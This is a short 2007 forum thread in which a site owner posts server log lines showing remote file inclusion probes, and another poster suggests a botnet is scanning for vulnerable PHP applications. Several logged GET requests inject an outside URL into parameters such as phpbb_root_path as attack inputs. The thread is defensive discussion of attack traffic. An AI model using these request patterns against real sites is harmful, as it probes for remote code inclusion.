O´ Reilly hacks

Posted: Mon Oct 22, 2007 8:47 am

My logs are filled with such entries:
165.228.129.11 - - [21/Oct/2007:08:29:09 +0200] "GET /vp/configure.php?phpbb_root_path=http://examples.oreilly.com/oracle2/readme.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

165.228.129.11 - - [21/Oct/2007:08:27:43 +0200] "GET /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://examples.oreilly.com/oracle2/readme.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

77.70.106.4 - - [21/Oct/2007:09:35:30 +0200] "GET [ Only registered users can see links on this board! Get registered or login! ] HTTP/1.0" 403 224 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

165.228.129.11 - - [21/Oct/2007:08:29:44 +0200] "GET /portal/portal.php?phpbb_root_path=http://examples.oreilly.com/oracle2/readme.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

etc.

Seems new I believe I didn´t saw Oreilly ever before in my logfiles.

Posted: Mon Oct 22, 2007 4:02 pm

The Orelly files contain nothing malicious that I can tell. Most likely this is just someone trying to play with their new botnet and see what sites are vulnerable.
I also see Intel.com and a bunch of Brazilian search engines being passed in such ways.

Really not much you can do about it.

Posted: Mon Oct 22, 2007 5:28 pm

You are right and the one IP above is a proxy.